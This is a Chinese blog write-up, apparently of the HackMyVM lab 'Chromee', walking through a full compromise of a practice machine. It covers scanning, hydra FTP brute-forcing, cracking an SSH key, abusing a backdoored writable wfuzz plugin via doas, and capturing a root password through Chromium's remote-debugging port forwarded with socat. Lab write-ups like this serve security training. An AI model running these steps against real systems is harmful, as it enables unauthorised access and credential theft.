<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/xxx/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"lvzhouhang.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="信息搜集arp-scan -l 12345678910┌──(root㉿kali)-[~&#x2F;Desktop&#x2F;tmp]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;gith">
<meta property="og:type" content="article">
<meta property="og:title" content="HackmyVM-Chromee">
<meta property="og:url" content="https://lvzhouhang.xyz/2025/03/21/Chromee/index.html">
<meta property="og:site_name" content="lvzhouhang">
<meta property="og:description" content="信息搜集arp-scan -l 12345678910┌──(root㉿kali)-[~&#x2F;Desktop&#x2F;tmp]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;gith">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee4.png">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee6.png">
<meta property="article:published_time" content="2025-03-21T11:11:42.000Z">
<meta property="article:modified_time" content="2025-03-21T12:09:37.562Z">
<meta property="article:author" content="lvzhouhang">
<meta property="article:tag" content="靶机">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/872323857/images/master/img/Chromee1.png">

<link rel="canonical" href="https://lvzhouhang.xyz/2025/03/21/Chromee/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>HackmyVM-Chromee | lvzhouhang</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/js/clicklove.js"></script>
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">lvzhouhang</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://lvzhouhang.xyz/2025/03/21/Chromee/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lvzhouhang">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lvzhouhang">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HackmyVM-Chromee
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2025-03-21 19:11:42 / 修改时间：20:09:37" itemprop="dateCreated datePublished" datetime="2025-03-21T19:11:42+08:00">2025-03-21</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/HackMyVM/" itemprop="url" rel="index"><span itemprop="name">HackMyVM</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>8.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>7 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><p>arp-scan -l</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp]</span><br><span class="line">└─# arp-scan -l</span><br><span class="line">Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129</span><br><span class="line">Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)</span><br><span class="line">192.168.31.2    08:00:27:01:8c:4d       PCS Systemtechnik GmbH</span><br><span class="line">192.168.31.100  08:00:27:f9:e1:65       PCS Systemtechnik GmbH</span><br><span class="line"></span><br><span class="line">3 packets received by filter, 0 packets dropped by kernel</span><br><span class="line">Ending arp-scan 1.10.0: 256 hosts scanned in 2.402 seconds (106.58 hosts/sec). 3 responded</span><br></pre></td></tr></table></figure>

<p>ip为192.168.31.100,然后用nmap扫描端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp]</span><br><span class="line">└─# nmap 192.168.31.100 -p-</span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 07:14 EDT</span><br><span class="line">Nmap scan report for chromee.hmv (192.168.31.100)</span><br><span class="line">Host is up (0.0019s latency).</span><br><span class="line">Not shown: 65531 closed tcp ports (reset)</span><br><span class="line">PORT      STATE SERVICE</span><br><span class="line">22/tcp    open  ssh</span><br><span class="line">80/tcp    open  http</span><br><span class="line">8080/tcp  open  http-proxy</span><br><span class="line">23333/tcp open  elxmgmt</span><br><span class="line">MAC Address: 08:00:27:F9:E1:65 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="80端口"><a href="#80端口" class="headerlink" title="80端口"></a>80端口</h1><p>gobuster扫描目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp]</span><br><span class="line">└─# gobuster dir -u &quot;http://192.168.31.100&quot; -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-me</span><br><span class="line">dium.txt -x .txt,.php</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.6</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</span><br><span class="line">===============================================================</span><br><span class="line">[+] Url:                     http://192.168.31.100</span><br><span class="line">[+] Method:                  GET</span><br><span class="line">[+] Threads:                 10</span><br><span class="line">[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt</span><br><span class="line">[+] Negative Status codes:   404</span><br><span class="line">[+] User Agent:              gobuster/3.6</span><br><span class="line">[+] Extensions:              txt,php</span><br><span class="line">[+] Timeout:                 10s</span><br><span class="line">===============================================================</span><br><span class="line">Starting gobuster in directory enumeration mode</span><br><span class="line">===============================================================</span><br><span class="line">/post.php             (Status: 200) [Size: 3]</span><br><span class="line">/secret.php           (Status: 200) [Size: 549]</span><br></pre></td></tr></table></figure>

<p>有一个post.php和secret.php,secret.php不会解析成php会直接下载下来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">#secret.php</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;Secret&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;?php</span><br><span class="line">    $greeting = date(&#x27;H&#x27;) &lt; 12 ? &#x27;早上好&#x27; : (date(&#x27;H&#x27;) &lt; 18 ? &#x27;下午好&#x27; : &#x27;晚上好&#x27;);</span><br><span class="line">    $visitorIP = htmlspecialchars($_SERVER[&#x27;REMOTE_ADDR&#x27;]);</span><br><span class="line"></span><br><span class="line">    echo &quot;&lt;h1&gt;&#123;$greeting&#125;，adriana&lt;/h1&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;p&gt;当前时间：&quot; . date(&#x27;Y-m-d H:i:s&#x27;) . &quot;&lt;/p&gt;&quot;;</span><br><span class="line">    echo &quot;&lt;p&gt;你的IP：&#123;$visitorIP&#125;&lt;/p&gt;&quot;;</span><br><span class="line">    if (isset($_GET[&#x27;aaa&#x27;])) &#123;</span><br><span class="line">    	$file_content = file_get_contents(&#x27;/opt/note/dic.txt&#x27;);</span><br><span class="line">    	echo $file_content;</span><br><span class="line">	&#125; else &#123;</span><br><span class="line">    		die();</span><br><span class="line">	&#125;</span><br><span class="line">    ?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<h1 id="8080端口"><a href="#8080端口" class="headerlink" title="8080端口"></a>8080端口</h1><p>先用gobuster扫描一下目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp]</span><br><span class="line">└─# gobuster dir -u &quot;http://192.168.31.100:8080&quot; -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2</span><br><span class="line">.3-medium.txt</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.6</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</span><br><span class="line">===============================================================</span><br><span class="line">[+] Url:                     http://192.168.31.100:8080</span><br><span class="line">[+] Method:                  GET</span><br><span class="line">[+] Threads:                 10</span><br><span class="line">[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt</span><br><span class="line">[+] Negative Status codes:   404</span><br><span class="line">[+] User Agent:              gobuster/3.6</span><br><span class="line">[+] Timeout:                 10s</span><br><span class="line">===============================================================</span><br><span class="line">Starting gobuster in directory enumeration mode</span><br><span class="line">===============================================================</span><br><span class="line">/javascript           (Status: 301) [Size: 328] [--&gt; http://192.168.31.100:8080/javascript/]</span><br><span class="line">/silence              (Status: 403) [Size: 281]</span><br><span class="line">/server-status        (Status: 403) [Size: 281]</span><br></pre></td></tr></table></figure>

<p>有一个silence，访问发现Forbidden了</p>
<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee1.png"></p>
<p>用bp的BypassPro插件发现换一种请求会变成301，感觉有问题，后面添加一个index.html发现绕过了</p>
<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee2.png"></p>
<p>有一个邮箱，将这个域名添加进hosts里，再去访问<a target="_blank" rel="noopener" href="http://chromee.hmv/secret.php%E5%8F%91%E7%8E%B0secret.php%E8%A7%A3%E6%9E%90%E4%BA%86%EF%BC%8CGET%E4%BC%A0%E5%85%A5aaa=1">http://chromee.hmv/secret.php发现secret.php解析了，GET传入aaa=1</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">下午好，adriana</span><br><span class="line">当前时间：2025-03-21 12:28:34</span><br><span class="line"></span><br><span class="line">你的IP：192.168.31.1</span><br><span class="line"></span><br><span class="line">The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.</span><br></pre></td></tr></table></figure>

<p>这里有两个人名，adriana和Lily，用cupp各生成一个字典，然后将两个字典合并爆破ftp(23333端口)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# hydra -L ./name -P ./pass 192.168.31.100 ftp -s 23333 -f  -t 50</span><br><span class="line">Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-21 07:32:30</span><br><span class="line">[DATA] max 50 tasks per 1 server, overall 50 tasks, 208 login tries (l:2/p:104), ~5 tries per task</span><br><span class="line">[DATA] attacking ftp://192.168.31.100:23333/</span><br><span class="line">[23333][ftp] host: 192.168.31.100   login: adriana   password: Lily2020</span><br><span class="line">[STATUS] attack finished for 192.168.31.100 (valid pair found)</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-21 07:32:31</span><br></pre></td></tr></table></figure>

<p>爆破出了账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# ftp adriana@192.168.31.100 23333</span><br><span class="line">Connected to 192.168.31.100.</span><br><span class="line">220 (vsFTPd 3.0.3)</span><br><span class="line">331 Please specify the password.</span><br><span class="line">Password:</span><br><span class="line">230 Login successful.</span><br><span class="line">Remote system type is UNIX.</span><br><span class="line">Using binary mode to transfer files.</span><br><span class="line">ftp&gt; ls -al</span><br><span class="line">229 Entering Extended Passive Mode (|||20808|)</span><br><span class="line">150 Here comes the directory listing.</span><br><span class="line">drwxr-xr-x    2 106      115          4096 Mar 09 08:13 .</span><br><span class="line">drwxr-xr-x    4 0        0            4096 Mar 09 08:12 ..</span><br><span class="line">-rw-r--r--    1 0        0            3414 Mar 09 08:13 ...</span><br><span class="line">-rw-r--r--    1 0        0             495 Mar 07 14:40 dic.txt</span><br><span class="line">226 Directory send OK.</span><br></pre></td></tr></table></figure>

<p>这有…文件，一开始以为是一个目录，cd不进去，也不看报错就没管了(唉，细节决定成败)导致卡了好长时间，但是卡的时候也没有荒废，在/srv目录下有一个zeus.conf，后面提权要用到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# cat zeus.conf</span><br><span class="line">permit follower as softly cmd /usr/local/bin/wfuzz</span><br><span class="line">permit nopass :softly as root cmd /usr/bin/chromium</span><br><span class="line">permit nopass :softly as root cmd /usr/bin/kill</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ftp&gt; cd /home</span><br><span class="line">250 Directory successfully changed.</span><br><span class="line">ftp&gt; ls</span><br><span class="line">229 Entering Extended Passive Mode (|||5941|)</span><br><span class="line">150 Here comes the directory listing.</span><br><span class="line">drwxr-x---    5 1000     1000         4096 Mar 21 08:18 follower</span><br><span class="line">drwxr-x---    5 1001     1001         4096 Mar 21 05:37 softly</span><br><span class="line">226 Directory send OK.</span><br></pre></td></tr></table></figure>

<p>还可以知道用户名</p>
<p>…文件是一个私钥，john可以爆破出来密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# john 1 --show</span><br><span class="line">id:cassandra</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# ssh follower@192.168.31.100 -i id</span><br><span class="line">Enter passphrase for key &#x27;id&#x27;:</span><br><span class="line">follower@Chromee:~$</span><br></pre></td></tr></table></figure>

<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>follower下有一个cat.git和note.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">follower@Chromee:~$ cat note.txt</span><br><span class="line">Think about rotations and the cat’s secrets.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">47 is not just a number, it&#x27;s a twist of fate.</span><br></pre></td></tr></table></figure>

<p>这个47提示的很明显是rot47</p>
<p>cat.gif用convert可以分离出来12张图片，但是没有用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">convert cat.gif 1.jpg</span><br></pre></td></tr></table></figure>

<p>不是空间轴可以试试时间轴</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# identify -format &quot;%T &quot; cat.gif</span><br><span class="line">65 98 65 100 102 98 67 6 6 6 6 6 6</span><br></pre></td></tr></table></figure>

<p>将后面的6个6去掉扔进cyberchef中解密然后rot47解密</p>
<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee3.png"></p>
<p>得到了p3p573r，因为前面拿到的zeus.conf能够知道follower需要密码才能以softly执行wfuzz</p>
<p>先用find找到wfuzz的路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find / -name &quot;wfuzz&quot; 2&gt;/dev/null</span><br><span class="line">/home/follower/.config/wfuzz</span><br><span class="line">/usr/local/bin/wfuzz</span><br><span class="line">/usr/local/lib/python3.9/dist-packages/wfuzz    #这个就是wfuzz的路径</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find ./ -writable 2&gt;/dev/null</span><br><span class="line">./plugins/payloads/file.py</span><br></pre></td></tr></table></figure>

<p>在他的wfuzz的目录下找可以写的文件能找到file.py,cat一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py</span><br><span class="line">import pty</span><br><span class="line">pty.spawn(&quot;/bin/bash&quot;)</span><br></pre></td></tr></table></figure>

<p>不用想了，肯定是作者降低难度了后门都留好了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u &quot;127.0.0.1&quot;</span><br><span class="line">Password:</span><br><span class="line"> /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz&#x27;s documentation for more information.</span><br><span class="line">softly@Chromee:/home/follower$</span><br></pre></td></tr></table></figure>

<p>上传pspy64，能发现每隔一段时间root用户都会执行secript.sh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2025/03/21 12:53:01 CMD: UID=0     PID=1504   | /bin/sh -c /root/script.sh</span><br><span class="line">2025/03/21 12:53:01 CMD: UID=0     PID=1505   | /bin/bash /root/script.sh</span><br></pre></td></tr></table></figure>

<p>结合题目名Chromee和前面得到的zeus.conf，能猜到肯定和浏览器有关系，运行linpeas.sh能看到/media下有一个debug.kdbx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/Desktop/tmp/test]</span><br><span class="line">└─# file debug.kdbx</span><br><span class="line">debug.kdbx: PDF document, version 1.7</span><br></pre></td></tr></table></figure>

<p>是一个pdf文件</p>
<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee4.png"></p>
<p>去网上查这个东西，谷歌浏览器自带这个工具chrome://inspect/，还有这个9222的默认端口（后面要用到）</p>
<p>先写一个authorized_keys</p>
<p>在网上查到开启远程debug的命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1</span><br></pre></td></tr></table></figure>

<p>因为靶机没有桌面，所以一定要带上–headless，不然会报错，启动好后再用socat端口转发</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">softly@Chromee:~$ ./socatx64.bin TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee5.png"></p>
<p>用谷歌浏览器连接，打开第一个连接</p>
<p><img src="https://raw.githubusercontent.com/872323857/images/master/img/Chromee6.png"></p>
<p>等一会就会发现向127.0.0.1/post.php发送一个key，不用base64解码，这个就是root的密码。</p>
<p>chromium的远程端口必须要是9222默认端口否则他监听不到就很难受</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%B6%E6%9C%BA/" rel="tag"># 靶机</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/02/18/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E9%9D%B6%E6%9C%BA%E8%AE%AD%E7%BB%83-Web3/" rel="prev" title="应急响应靶机训练-Web3">
      <i class="fa fa-chevron-left"></i> 应急响应靶机训练-Web3
    </a></div>
